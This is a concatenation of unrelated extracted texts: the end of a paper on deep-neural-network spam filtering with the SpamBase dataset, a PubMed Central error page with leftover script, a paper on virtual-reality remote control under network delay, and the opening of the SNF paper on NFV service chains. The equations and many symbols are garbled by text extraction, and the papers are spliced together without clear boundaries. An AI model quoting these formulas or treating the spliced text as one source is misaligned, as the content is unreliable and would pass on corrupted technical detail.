layer.Although the deep neural network looks complex, it is still the same as the perceptron from a small local model. Input layer Hidden layer1 Hidden layer2 Hidden layern Output layer Figure 1. Structure diagram of deep neural network We use l jk w to respresent the weight coefficient between the neuron in the layer and the neuron in the layer, l j b to represent the bias of the neuron in the layer, to represent the activation value of the neuron in the layer. We can get the following relationship between the activation value of the neuron in the layerand the activation value of all neuron sin the layer:   We assume that l w is the weight coefficient matrix of all the neurons in the layer, l b is the bias matrix of the layer, l a is the activation value of the layer, l z is the weighted input of all neurons in the layer, Then l jk w is the weight coefficient of row j, column k. The relationship between the activation value of the layer and the activation value of the layer can be expressed by the following matrix relationship:       Here respresents the non-linear activation function of the nodes on the hidden layers, and the traditional DNN uses sigmoid function usually, as shown in expression (3).Because the sigmoid function has properties such as monotone increasing and its inverse function has the property of monotone increasing, it is often used as a threshold function of neural networks, It maps the variables between 0 and 1.The sigmoid function curve is shown in figure 2:  Figure 2. The sigmoid function curve III. ALGORITHM DESCRIPTION Implementation process of mail classification algorithm based on deep neural network was shown in Figure 3. 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 19 Read the contents of the email for training and extract the email features for training Construct a DNN containing multiple hidden layers, set the number of hidden layers ,set the number of nodes on each layer, set training batches and the number of training data for each batch Train DNN to generate DNN classifier Use the DNN classifier to classify the testing email and mark whether they are spam Read the contents of the email for testing and extract the email features for testing Begin End Compare the classification result of the email with the actual tag, verify the correctness of the algorithm Figure 3. Algorithm execution process Step 1: Read the contents of the email for training from the Spam Base dataset and extract the email features for training such as word_freq_, char_freq_, capital_run_length_average, capital_run_length_longest, capital_run_length_total, and so on. Step 2: Construct a DNN containing multiple hidden layers, set the number of hidden layers(n_classes) ,set the number of nodes on each layer (hidden_units) ,set training batches( steps) and the number of training data for each batch (batch_size). Step 3: Train DNN to generate DNN classifier. Step 4: Read the contents of the email for testing from the SpamBase data set and extract the email features for testing such as word_freq_, char_freq_, capital_run_length_average, capital_run_length_longest, capital_run_length_total, and so on. Step 5: Use the DNN classifier to classify the testing email and mark whether they are spam(1 or 0). Step 6: Compare the classification result of the email (y_predict) with the actual tag(y_test), calculate the accuracy of the algorithm in the email classification(accuracy_score) and verify the correctness of the algorithm. IV. EXPERIMENTAL RESULTS AND ANALYSIS In order to verify the effect of the email classification algorithm based on DNN, in this paper we constructeda DNN with 2 hidden layers. The number of nodes in each hidden layer was 30. When the training set was trained, we set up 2000 batches, and each batch has 3 trained data. We used the famous SpamBase dataset as the data set, which was from the UCI machine learning library at the University of California, USA. The specific situation is shown in table I. We compared the two kinds of email filtering algorithms of DNN and naive Bayes with accuracy, which is the main evaluation standard of email filtering technology. The accuracy is defined as follows: emails of number Total email identified correctly of Number Accuracy   We did five groups of experiments in this paper.The selection case of training set and testing set in each experiment is shown in table II. 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 20 TABLE I. SPAMBASE DATA SET Index Value Index Value Total number of the email 4601 Number of attributes 57 Number of email category labels 2 Email category Validemail，spam email Number of the spam email 1813 The proportion of spam email 39.4% Number of the valid mail 2788 The proportion of validemail 60.6% TABLE II. THE SELECTION CASE OF TRAINING SET AND TESTING SET group number The proportion of the training set in all data The number of email in training set The proportion of the testing set in all data The number of email in testing set 1 90% 4140 10% 461 2 80% 3680 20% 921 3 70% 3220 30% 1381 4 60% 2760 40% 1841 5 50% 2300 50% 2301 The experimental results were shown in Figure 4. Figure 4. The comparison of accuracy of the two algorithms The experiment result showed that DNN was higher than naive Bayes in the accuracy of email classification when the proportion of the training set was 10%, 20%, 30%, 40% and 50% respectively, and DNN showed a good classification effect. V. CONCLUSION The application of email classification algorithm based on deep neural network is studied in this paper. The algorithm constructed multiple hidden layers and generated DNN classifiers through training. The experiment results showed that the accuracy of the algorithm is obviously higher than the naive Bayes algorithm. With the development of science and technology, spam manifests in many forms and the damage of it is more serious, this puts forward higher requirements for the accuracy of spam recognition. The focus of next research will becombining various algorithms to further improve the effect of email classification. ACKNOWLEDGMENTS New network and detection control national joint engineering laboratory fund program (GSYSJ2016017). Xi’an Technological University Principal Scientific Research Fund Project: XAGDXJJ－1315 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 21 REFERENCE [1] Cao Cuiling, Wang Yuanyuan and Yuan Ye, “Research of a spam filter based on improved naive Bayes algorithm, ”Chinese Journal of Network and Information Security, Vol.3No.3, pp. 64-70, March 2017. [2] Wang Zhiyong and Liu Hongmei, “DESIGN AND IMPLEMENTATION OF BAYESIAN SPAM FILTE Ｒ ING SYSTEM,” Journal of Inner Mongolia Agricultural University(Natural Science Edition), Vol.38 No.3, pp.82-86, May. 2017. [3] Wang QingSong and Wei Ruyu, “Bayesian Chinese Spam Filtering Method Based on Phrases,” Computer Science, Vol. 43 No. 4, pp.256-259, Apr 2016. [4] Neural Networks and Deep Learning [EB/OL]. http://neuralnetworksanddeeplearning.com. [5] Li Kun, CHai Yumei and Zhao Hongling, “Estimation of Fetal Weight Based on Deep Neural Network,” Computer Science, Vol. 43 No. 11A, pp. 73-76, Nov 2016. [6] Cao Meng, Li Hongyan and Zhao Rongrong, “A Pitch Detection Method Based on Deep NeuralNetwork,” Microelectronics & Computer, Vo1.33 No.6, pp. 143-146, June 2016. [7] Ren Rongrong, Zhou Mingquan and Geng Guohua, “The multi-scale features extraction method based on deep neural network”, Journal of Northwest University(Natural Science Edition), Vol. 47No.2, pp. 215-221, Apr2017. [8] S.L.Zhang Research on Deep Neural Networks based Models for Speech Recognition(Ph.D., University of Science and Technology of China, China 2017), p.35 work_5e3llx7bebbyjotwjnmnxonmk4 ---- wp-p1m-39.ebi.ac.uk Params is empty 404 sys_1000 exception wp-p1m-39.ebi.ac.uk no 265369843 Params is empty 265369843 exception Params is empty 2021/04/06-17:58:19 if (typeof jQuery === "undefined") document.write('[script type="text/javascript" src="/corehtml/pmc/jig/1.14.8/js/jig.min.js"][/script]'.replace(/\[/g,String.fromCharCode(60)).replace(/\]/g,String.fromCharCode(62))); // // // window.name="mainwindow"; .pmc-wm {background:transparent repeat-y top left;background-image:url(/corehtml/pmc/pmcgifs/wm-nobrand.png);background-size: auto, contain} .print-view{display:block} Page not available Reason: The web page address (URL) that you used may be incorrect. Message ID: 265369843 (wp-p1m-39.ebi.ac.uk) Time: 2021/04/06 17:58:19 If you need further help, please send an email to PMC. Include the information from the box above in your message. Otherwise, click on one of the following links to continue using PMC: Search the complete PMC archive. Browse the contents of a specific journal in PMC. Find a specific article by its citation (journal, date, volume, first page, author or article title). http://europepmc.org/abstract/MED/ work_5eaxej5xgbalnghivmnkptf75m ---- 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 22 The Remote Control System Based on the Virtual Reality SU Xiaohui School of Computer Science and Engineering, Xi’an Technological University, Xi’an 710021 China e-mail: 563937848@qq.com Dong Qiyu School of Computer Science and Engineering, Xi’an Technological University, Xi’an 710021 China Huang Mengyao School of Computer Science and Engineering, Xi’an Technological University, Xi’an 710021 China Xu Shuping School of Computer Science and Engineering, Xi’an Technological University, Xi’an 710021 China Abstract—Aiming at the issues of random delay and delay uncertainty of the control information network, a kind of network remote closed-loop control structure based on virtual reality simulation is proposed. The method in accordance with the idea of open-loop system to achieve closed-loop control make the influence of network latency excluded real-time little closed-loop control system of controlled object value and no effect on the characteristics of the controlled object. Simulation results show that the structure of the remote control system has good dynamic quality and reduce the impact of network delay aspects to the system dynamics characteristics. It is a reference idea to the remote real-time closed-loop control. Keywords-Virtual Reality; Network Time-delay; Remote Control I. INTRODUCTION The network control system is the extension of the control distance, the long-distance transmission of control signals will inevitably bring about the delay of the signal [1-2]. Remote control system with Internet based on TCP/IP protocol as a means of information transfer can be achieved the purpose for control equipment connected to any node within the Internet at any time, any place [3-5].Remote control system based on control information network actually is pulled away the both ends of control system, between the controller and the controlled object across a computer network to do the information transmission, but in such a system, the basic requirements of the control system has not changed, only increased the difficulty of control [6]. The experiments show that the larger delay produced a certain time delay and uncertainty during transfer in the Internet information, which will allow the entire system to control quality seriously deteriorated, and it’s a bottleneck problem of impact the development of remote control technology based on Internet [7]. In order to relief the impact of network latency on system performance, we must seek new control concepts from the basic principles of the control system. An open, interactive and realistic virtual environment created by virtual reality technology make people immersed in virtual reality to make decisions on changes in the environment based on virtual environments provided by virtual reality and to impact the virtual environment [8]. In the "real" virtual environment, the input is a set of virtual parameters, the output is another set of virtual parameters, the two parameters linked accordance with a set relationship, the operator can respond to the input parameters timely. Because the technology has a good "reality" and "forward-looking", this paper used the virtual reality simulation applied to network remote control structures and mailto:xusp686@163.com 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 23 accordance with the idea of open-loop system to achieve closed-loop control make the impact of network latency out of real-time closed-loop control system of the controlled object value. It’s weak effectively the impact of network latency on the performance of the entire control system. II. THE THREE CLOSED-LOOP REMOTE CONTROL STRUCTURES BASED ON VIRTUAL REALITY TECHNOLOGY A. System Architecture Transmission delay link of the network makes the time lag existed between remote operations and controlled object, there are difference between the operations can be based on parameters and needs based on the parameters resulting in the decision-making accuracy and the effectiveness of instruction. Shown in Figure 1, you can build a virtual operating environment for the remote operator by means of the actual controlled object and its control parameters of simulation model. In this environment, the simulation charged object is located in a remote client and no network transmission delay between the remote operators, the operator can real-time operation to the simulation charged objects. And at the same time the control signals )1( k , )(k , )1( k imposed in the simulation charged objects delivery to the actual controlled object over the Internet and taken back continually the actual status information )1( ky , )(ky , )1( ky of the controlled object, and real-time compare the state of its simulation controlled object to monitor the running state of the actual controlled object. The network delay will produce a similar delay influence for every transfer data, match the appropriate buffer technology can make to maintain continuous for data flow and make the control signal worked on the actual controlled object and taken back to the status signal to maintain a continuous to achieve real-time closed-loop control for the actual controlled object. Simulation Charged Objects Remote Operator Internet Actrual Charged Objects γ(k-1)γ(k)γ(k+1)... y(k-1)y(k)y(k+1)... Virtual Reality Figure 1. Virtual Reality Environments Structural Diagram Network latency makes remote real-time control has been limited, how to "real" reflect the actual system running status by means of the system model and operators develop and implement a control command according to the "real" virtual environment is the applications target of virtual reality technology in the remote control. B. Application examples of Virtual Simulation Environment In order to describe clearly the application background of virtual reality simulation, we made the application example shown in Figure 2 based on the virtual simulation environment. The left half of the figure is the remote operator to create a virtual simulation environment based on virtual reality ideas, including the display part and the control panel part, of course, this is a simple virtual reality environment, obviously, all the advantage of technology allowing operators into the reality and the technology and equipment facilitate operator to make a judgment and final operation can be used to create more complex and better functions virtual reality. The operating handle in the control panel in the figure is only a schematic which mainly used to describe a method based on virtual reality simulation environment remote control. As shown in Figure 2, the schematic is a system for target tracking and the implementation of the fight against by a game controller in the control panel (one can shake the handle on the right control panel), the launch button (two buttons on the left control panel) and control objects in the operation display interface. First of all, the system achieve the control objects and target of virtual reality association to 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 24 the actual control objects and target, that is virtual reality can be more true response to the physical environment, followed instructions in the control panel to be able to timely apply to the control object of actual environment. In the virtual simulation environment, operator consider only the running state of virtual reality, that is thought the display of the virtual simulation environment such as playing video games operation control object to track the target by game controller, then within the effective range launched the missile pursuit or shooting by launch button. When the target shoot down by players means the actual target has been shot down and task completed. Computer Network Wireless Interface targe t Control Object targe t Control object Actual Control SystemDisplay part of Virtual Simulation Environment Control Panel Figure 2. An Application Example Based on Virtual Simulation Environment III. THE THREE LOOP-CONTROL STRUCTURE OF VIRTUAL SIMULATION ENVIRONMENT Due to the presence of network delay on the remote control made operator dialogue to the controlled object has time delay, to meet the good characteristics of the controlled object response and real-time closed-loop control of the remote control operator ,a three closed-loop remote control system based virtual reality simulation was proposed on concept of virtual reality which control the both ends namely the operating side and charged object side to create the independent control value closed-loop structure, the dashed box shown in Figure 3 as both ends of the dumbbell structure to meet real-time closed-loop control of the actual controlled object and the virtual simulation charged object to control value, connect both ends of located at operating side and dumbbell structure of charged object as a dumbbell handle through the Internet, big closed-loop with network delay thereby to build a dumbbell-shaped three closed-loop structure. Small closed-loop at dumbbell both ends can be run independently by operators’ instructions and the run command and result can be communicate with each other by middle big closed-loop-dumbbell handle to carry out a comparison of the information, interaction and updates of two little closed-loop system at dumbbells both ends. Visibility, in this structure, little closed-loop at dumbbells both ends can be run independently without network delay links, so there is a fast response speed to charged value. The dumbbell handle big closed loop with time delay links can use the actual charged object parameters at one end of the dumbbell structure according to the parameter variations of the both ends at dumbbell to modify continuously running parameters and status of virtual simulation system at the other end of dumbbell structure which make the running state of simulation system and actual system similar or even identical, while operator to virtual simulation running state of one end of system based on dumbbell structure to decide the next control instruction and judge the running state of the charged object and actual object whether identified according by running result of both ends of dumbbell structure, and judge actual system whether running normal in accordance with operating desired way. Therefore, in the three closed-loop remote control system, the operator can be give the required control instructions based on virtual simulation system and ultimately achieve the purpose of remote real-time control. See, the key to the system is how to create a virtual closed-loop architecture and network delay model, that is to establish a closed-loop control system of practical charged objects and their parameters, at the same time, to establish another set of the controlled object model as virtual real controlled object, then make the remote control "immersed" in the virtual reality of the controlled object model operate the controlled object model in virtual reality, while sent the operating instructions to the actual controlled object to achieve the purpose of real-time remote control the controlled object. In order to achieve the purpose of real-time control must be sent the state of the actual system into a virtual reality, so that controller can not only be implement real-time operating based on the object model in virtual reality, but also can monitor and compare the 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 25 actual running state of the actual controlled object constantly to understand three closed-loop remote control system of this dumbbell-shaped whether normal running and the pace of the small closed loop at both ends of dumbbell head whether functioning properly and take the necessary measures in accordance with this result. Therefore, the key of the structure is to accurately predict network delay and accurate establish the controlled object model. Controller Virtual Charged Object Model Prediction Output Prediction Delay Prediction Delay Remote Controls Compare Network Delay Network Delay Controller Charged Object Actual Output Remote Control Terminal Figure 3. Dumbbell-shapes’ Three Loop-closed Structure Diagram of Remote Control IV. VIRTUAL CHARGED OBJECT MODELING AND SIMULATION Build a brushless DC motor remote control virtual simulation environment as shown in Figure 4 in accordance m function and simulink simulation module provided with the Matlab. The brushless DC motor model used the model provided in the Matlab standard library, one of the brushless DC motor due to large air gap ignored the rotor and the stator flux saturation, the magnetic flux as a linear function, and set the brushless DC motor worked in the way of two-phase conduction star-shaped three-phase six-state power supply, its mathematical model in abc phase plane establish a brushless DC the motor mathematical model [9-10]: )]2(32[ 3 1 ''' ccbasbcab s a piRVV L i dt d    (1) )]2(3[ 3 1 ''' cbabsbcab s b piRVV L i dt d    (2) )( bac i dt d i dt d i dt d  (3) )( ''' ccbbaae iiipT   (4) where, Ls-stator coil inductance Rs-stator coil resistance ia, ib, ic-a,b,c phase current ' a  , ' b  , ' c  -a, b ,c opposite electromotive force ab V , bc V -line voltage between ab and bc   - Rotor angular velocity  - Rotor permanent magnet generated flux amplitude at the stator P -pole pair number Te-electromagnetic torques mechanical equations: )( 1 me TFT Jdt d       dt d where, J - sum of inertia of rotor and load F - sum of viscous friction coefficient of rotor and load m T - mechanical torque of shaft 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 26 Figure 4. Schematic Diagram of Brushless DC Motor Virtual Simulation System Random set network delay is 0.1 seconds and set the parameters of the motor: sR (2.8750ohm), Ls (8.5e-3H), flux (0.175Wb), the top width of trapezoidal wave back-EMF (120o), moment of inertia (0.8e-3J), friction coefficient (1e-3F), and pole number (4P). Set the network delay is 0.1 seconds, a small closed-loop delay 0.0001 seconds, at t = 0.01 seconds add a step input ,and add 3N.m load torque Tm when t = 0.1 seconds then simulation, the result shown in Figure 5. To learn more about the transmission delay of network, analyze the impact of transmission delay on both ends of the dumbbell-shaped virtual simulation environment as shown in figure 3. Assume that the simulation of the controlled object and the actual controlled object is exactly the same, the same model shown in Figure 8 also on behalf of simulation controlled object and actual controlled object. And step function as input, set to a value of 0 and 0.1 seconds of delay link "Delay" and "Delay1 respectively, which Delay2 is the delay within the small closed-loop system, where is set to 0.001 seconds, you can get the results shown in Figure 5 after simulation run. Which a diagram shows the control commands R issued from the operator (fine straight line as shown in figure) a direct work on the controlled object without delay, while the output out1 of controlled object (dotted line) is not extended and out2 (thick solid line) the delayed output. Figure b shows a control command nR issued from the operator after delay work on the controlled object, and the output out1n of the controlled object (dotted line) is not delay and out2n (thick solid line) was delay again output. Which R, out1, represent respectively the input and output of the simulation actual controlled object; nR , out2n represents input and output of the actual controlled object; out1 and out1n represents the artificial delay output in order to compare the simulation objects and the actual object output in Figure 5. (a) (b) Figure 5. Impact of Delay Links on the System Input and Output（a）Response Curve Without Delay (b) Response Curve Of The Input Delay 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 27 A diagram in Figure 5 shows speed input R of speed small closed-loop of one end of the dumbbell structure does not contain the of the network delay (thin straight line as shown in the figure), the response values out1 (dotted line) and out2 value of the response after the network delay on closed-loop transmission (thick solid line); Figure b shows the input R of speed set in the other side of the dumbbell structure after through a large closed-loop network delay (a thin straight line), and response values out1 of system work on the input (dotted line), and the out2 of the response through the network closed-loop transmission delay (thick solid line). Which the one-way network delay time is 0.1 seconds, the delay value can be set by hand in the simulation, of course, can be projection product by the radial basis function network delay model. V. CONCLUSION For the network closed-loop system of human controller as the study object combined with human characteristics as well as the requirements of network closed-loop control system, A method based on virtual reality simulation network remote closed-loop control was proposed. In this control structure, the idea of achieve closed-loop control in accordance with the open-loop system to exclude the impact of network delay on real-time closed-loop control system of the controlled object control value and no effect on the characteristics of controlled object; the charged object remote simulation system based on virtual reality simulation makes the object of fast, real-time remote control has been based; virtual reality simulation system itself constantly updated according with the actual environment changes to ensure that based on the virtual reality remote control has a certain authenticity. Simulation results show that the remote control system with this structure has good dynamic quality and reduced the impact of network delay links on the system dynamics characteristics which a reference ideas to the remote real-time closed-loop control. ACKNOWLEDGMENT The authors wish to thank the cooperators. This research is partially funded by the Project funds in shaanxi province department of education (17JK0381). REFERENCES [1] Du Dajun, Fen Minrui, Song Yang et al. Briefly reviewed and prospects of network control systems [J]. Chinese Journal of scientific instrument, 2014, 32(03):713-717. [2] Wang Xu, Wang Zhongjie. Design of embedded network control system based on TCP / IP protocol stack [J]. System simulation technology, 2014, 7(1):54-58 [3] Zhou Zude, Chen Benyuan et al. Research of Networked control system time delay distribution [J]. Control and decision, 2015, 25(4):592-597 [4] Guan Shou-ping, Ying Ting. Network control system predictive control based on pole placement and time delay error compensation [J]. Information and control, 2012, 38(01):37-42. [5] Yang Yunhang, Li Zhizhong, Dong Wei et al. Missile repair training system based on virtual reality [J]. Acta ARMAMENTARII, 2013, 20(6):297-300 [6] Zhuang Yah, Wang Wei, Yun Wei-ming, “The research and development of network based robot control technology” [J]. Robot, 2014, 24(3):276-282. [7] Huang J Q, Lew is FL, Liu K A, “Neural predictive control for telerobot swith time delay” [J]. Journal of Intelligent and Robotic Systems, 2012, 29:1- 25. [8] Chen, S, C.F.N. Cowan, and P.M. Grant, “Orthogonal Least Squares Learning Algorithm for Radial Basis Function Networks”, IEEE Transactions on Neural Networks, 2013, Vol. (2): 302-309. [9] Y. Kanayama, N. Miyake, “Trajectov Generation for Mobile Robots”, Robotics Research, the MIT Press, Vol. 3, 2006,pp 333-340. [10] Zhou Yuanshen, “AC and DC speed control system and MATLAB simulation” [M], Beijing, China Electric Power Press, 2013 work_5i3h5iv2yrhdznh444ehpmhe7a ---- Submitted 23 September 2016 Accepted 11 October 2016 Published 14 November 2016 Corresponding author Georgios P. Katsikas, katsikas@kth.se Academic editor Pamela Zave Additional Information and Declarations can be found on page 26 DOI 10.7717/peerj-cs.98 Copyright 2016 Katsikas et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS SNF: synthesizing high performance NFV service chains Georgios P. Katsikas1, Marcel Enguehard2,3, Maciej Kuźniar1, Gerald Q. Maguire Jr1 and Dejan Kostić1 1 Department of Communication Systems (CoS), School of Information and Communication Technology (ICT), KTH Royal Institute of Technology, Kista, Stockholm, Sweden 2 Network and Computer Science Department (INFRES), Telecom ParisTech, Paris, France 3 Paris Innovation and Research Laboratory (PIRL), Cisco Systems, Paris, France ABSTRACT In this paper we introduce SNF, a framework that synthesizes (S) network function (NF) service chains by eliminating redundant I/O and repeated elements, while consolidating stateful cross layer packet operations across the chain. SNF uses graph composition and set theory to determine traffic classes handled by a service chain composed of multiple elements. It then synthesizes each traffic class using a minimal set of new elements that apply single-read-single-write and early-discard operations. Our SNF prototype takes a baseline state of the art network functions virtualization (NFV) framework to the level of performance required for practical NFV service deployments. Software-based SNF realizes long (up to 10 NFs) and stateful service chains that achieve line-rate 40 Gbps throughput (up to 8.5x greater than the baseline NFV framework). Hardware-assisted SNF, using a commodity OpenFlow switch, shows that our approach scales at 40 Gbps for Internet Service Provider-level NFV deployments. Subjects Computer Networks and Communications Keywords NFV, Service chains, Synthesis, Single-read-single-write, Line-rate, 40 Gbps INTRODUCTION Middleboxes hold a prominent position in today’s networks as they substantially enrich the dataplane’s functionality (Sherry et al., 2012; Gember-Jacobson et al., 2014). However, to manage traditional middleboxes requires costly capital and operational expenditures; hence, network operators are adopting network functions virtualization (NFV) (European Telecommunications Standards Institute, 2012). Among the first challenges in NFV was to scale software-based packet processing by exploiting the characteristics of modern hardware architectures. To do so, several works leveraged parallelism first across multiple servers and then across multiple cores, sockets, memory controllers, and graphical processing units (GPUs) (Han et al., 2010; Kim et al., 2015b) within a single server (Dobrescu et al., 2009; Dobrescu et al., 2010). Attaining hardware-based forwarding performance was difficult to achieve, even with highly-scalable software-based packet processing frameworks. The main reason was the poor I/O performance of these frameworks. Thus, the focus of both industry and academia shifted to customizing operating systems (OSs) to achieve high-speed network I/O. For example, by using batch packet processing (Kim et al., 2012), static memory pre-allocation, and zero copy data transfers (Rizzo, 2012; DPDK, 2016). How to cite this article Katsikas et al. (2016), SNF: synthesizing high performance NFV service chains. PeerJ Comput. Sci. 2:e98; DOI 10.7717/peerj-cs.98 https://peerj.com mailto:katsikas@kth.se https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.98 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.98 1We provide a detailed comparison of our work with both E2 and OpenBox in the ‘Related Work’ section. Modern applications require combinations of network functions (NFs), also known as service chains, to satisfy their services’ quality requirements (Quinn & Nadeau, 2015). With all the above advancements in place, NFV instances achieved line-rate forwarding at tens of millions of packets per second (Mpps); however, performance issues remain when several NFs are chained together. State of the art frameworks such as ClickOS (Martins et al., 2014) and NetVM (Hwang, Ramakrishnan & Wood, 2014) have reported substantial throughput degradation when realizing chains of interconnected, monolithic NFs. The first consolidation attempts targeted application layer (e.g., deep packet inspection) (Bremler-Barr et al., 2014) and session layer (e.g., HTTP) (Sekar et al., 2012) consolidation. However, a lot of redundancy still resides lower in the network stack. Anderson et al. (2012) describe how xOMB allows them to build programmable and extensible open middleboxes specialized for request/response based communication. In addition, Slick (Anwer et al., 2015) introduced a programming language to deploy network-wide service chains, driven by a controller. Slick avoids redundant operations and shares common elements; however, its decentralized consolidation still realizes a chain of NFs as distributed processes. Most recently, E2 (Palkar et al., 2015) showed how to schedule NFs across a cluster of machines for high throughput. Also, OpenBox (Bremler-Barr, Harchol & Hay, 2016) introduced an algorithm that merges processing graphs from different NFs into a single processing graph. Contemporaneously with E2 and OpenBox, our work implements the mechanisms fully specified in (Enguehard, 2016) and represents the next logical step in high-performance NFV research.1 In the case of network-wide deployments, chains suffer from the latency imposed by interconnecting different machines, processes, and switches, along with potential virtualization overheads. In the case of single-server deployments, where the NFs are pinned to a specific (set of) core(s), throughput is bounded by the increasing number of context switches as the length of the chain increases. Based on our measurements, context switches cause a domino effect on cache utilization because of continuous data invalidations and the number of CPU cycles spent forwarding packets along the chain. This leads to increased end-to-end packet latency and considerable variation in latency (jitter). In this paper, we describe the design and implementation of the Synthesized Network Functions (SNF), our approach for dramatically increasing the performance of NFV service chains. The idea in SNF is simple: create spatial correlation to execute service chains as possible to the speed of the CPU cores operating on the fastest, i.e., L1, cache of modern multi-core machines. SNF leverages the ever-continuing increases in numbers of cores of modern multi-core processor architectures and the recent advances in user-space networking. SNF automatically derives traffic classes of packets that are traversing a provider-specified service chain of NFs. Packets in a traffic class are all processed the same way. Additionally, SNF handles stateful NFs. Using its understanding of each of the per-traffic class chains, SNF then synthesizes equivalent, high-performance NFs for each of the traffic classes. In a straightforward SNF deployment, one CPU core processes one traffic class. In practice, SNF allocates multiple CPU cores to execute different sets of traffic classes in isolation (see the ‘SNF Overview’ section). Katsikas et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.98 2/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.98 SNF’s optimization process performs the following tasks: (i) consolidates all the read operations of a traffic class into one element, (ii) early-discards those traffic classes that lead to packet drops, and (iii) associates each traffic class with a write-once element. Moreover, SNF shares elements among NFs to avoid unnecessary overhead, and compresses the number and length of the chain’s traffic classes. Finally, SNF scales with an increasing number of NFs and traffic classes. This architecture shifts the challenge to packet classification, as one component of SNF has to classify an incoming packet into one of the pre-determined traffic classes, and pass it to the synthesized function. We extended popular, open-source software to improve the performance of software-only packet classification. In addition, we employed an OpenFlow (McKeown et al., 2008) switch as a packet classifier to demonstrate the performance possible by a sufficiently powerful programmable network interface (commonly abbreviated as NIC). The benefits of SNF for network operators are multifold: (i) SNF dramatically increases the throughput of long NF chains, while achieving low latency, and (ii) it does so while preserving the functionality of the original service chains. We implemented the SNF design principles into an appropriately modified version of the Click (Kohler et al., 2000) framework. To demonstrate SNF’s performance, we compare it against the fastest Click variant to date, called FastClick (Barbette, Soldani & Mathy, 2015). To show SNF’s generality we tested its performance in three uses cases: (i) a chain of software routers, (ii) nested network address and port translators (NAPTs) (Liu et al., 2014), and (iii) access control lists (ACLs) using actual NF configurations taken from Internet Service Providers (ISPs) (Taylor & Turner, 2007). Our evaluation shows that software-based SNF achieves 40 Gbps, even with small Ethernet frames, across long (up to 10 NFs), stateful chains. In particular, it achieves up to 8.5x more throughput and 10x lower latency with 2–3.5x lower latency variance than the original NF chains implemented with FastClick, when running on the same hardware. Offloading traffic classification to a commodity OpenFlow switch allows SNF to realize re- alistic ISP-level chains at 40 Gbps (for most of the frame sizes), while bounding the median chain latency to below 100 µs (measured from separate sending and receiving machines). In the rest of this paper, we provide an overview of SNF in the ‘SNF Overview’ section. We introduce our synthesis approach in the ‘SNF Architecture’ section and a motivating example in the ‘A Motivating Use Case’ section. Implementation details and performance evaluation are presented in the ‘Implementation’ section and in the ‘Performance Evaluation’ section, respectively. We discuss verification aspects in the ‘Verification’ section. The ‘Limitations’ section discusses the limitations of this work and the ‘Related Work’ section positions our work with respect to the state of the art. Finally, the ‘Conclusion’ section concludes this paper. SNF OVERVIEW The idea of synthesizing network service components consorts with a powerful property: data correlation in network traffic. In a network system, this property is mapped to spatial locality with respect to the receiver’s caches. SNF aggregates parts of the flow space into Katsikas et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.98 3/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.98 Core 1 Multi-threaded SNF Classifier with chain-level traffic class units (TCUs) SNF Rewriter-Core 3 SNF Rewriter-Core 4 SNF Rewriter-Core 5 SNF Rewriter-Core k Traffic Domain 1 Symmetric Receive-Side Scaling Bi-directional Flow Traffic Domain 2 ... Dedicated cores per NIC for I/O Core 2 SNF Synthesizer with stateful per core rewriters Figure 1 An overview of SNF running on a machine with k CPU cores and 2 NICs. Dedicated CPU cores per NIC deliver bi-directional flows to packet processing CPU cores via Symmetric RSS. Processing cores concurrently classify traffic and access individual, stateful SNF rewriters to modify the traffic. traffic class units (TCUs) (the detailed definition is given in the ‘Abstract service chain representation’ section), which are then mapped to sets of (re)write operations. By carefully setting the CPU affinity of each TCU, this aggregation enforces a high degree of correlation in the traffic (seen as logical units of data) resulting in high cache hit rates. Our overarching goal is to design a system that efficiently utilizes per core and across cores cache hierarchies. With this in mind, we design SNF based on Fig. 1. In the example shown in this figure, we assume that a network operator wants to deploy a service chain between network domains 1 and 2. For simplicity we also assume that there is one NIC per domain. A set of dedicated cores (i.e., Core 1 and 2 for the NICs facing domains 1 and 2, respectively) attempts to read and write frames at line-rate. Once a set of frames is received, say by core 1, it is transferred to the available processing cores (i.e., Cores 3 to k). Frame transfers can occur at high speed via a shared cache, which has substantial capacity in modern hardware architectures. Once a processing core acquires a frame, it executes SNF as shown in Fig. 1. First the core classifies the frame (green rectangles in Fig. 1) in one of the chain’s TCUs and then applies the required synthesized modifications (blue rounded-rectangle in Fig. 1) that correspond to this TCUs out of the chain. Both classification and modification processes are highly parallelized as different cores can simultaneously process frames that belong to different TCUs. We detail both processes in the ‘Synthesis steps’ section. The key point of Fig. 1 is that a core’s pipeline shares nothing with any other pipeline. We employed the symmetric Receive Side Scaling (RSS) (Intel, 2016) scheme by Woo & Park (2012) to hash input traffic in a way that a flows’ bi-directional packets are always served by the same SNF rewriter, hence the same processor. This scheme allows a core to process a TCU at the maximum processing speed of the machine. Main objectives The primary goal of SNF is to eliminate redundancy along the chain. The sources of redundancy in current NF chains and the solutions that our approach offers are: Katsikas et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.98 4/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.98 (A) Multiple network I/O interactions between the chain and the backend dataplane occur because each NF is an individual process. We solve this by placing NF chains in a single logical entity. Once a packet enters this entity, it does not exit until all the chain operations are applied. (B) Late packet drops appear in NF chain implementations when packets unnecessarily pass through several elements before getting dropped. SNF discards these packets as early as possible. (C) Multiple read operations on the same field occur because each NF contains its own decision elements. A typical example is an Internet protocol (IP) lookup in a chain of routers. While SNF is parsing the initial chain, it collects the read operations and constructs traffic classes encoded as paths of elements in a directed acyclic graph (DAG). Then, SNF synthesizes these elements into a single classifier to realize both routing and filtering. (D) Multiple write operations on the same field overwrite previous values. For example, the IP checksum is modified twice 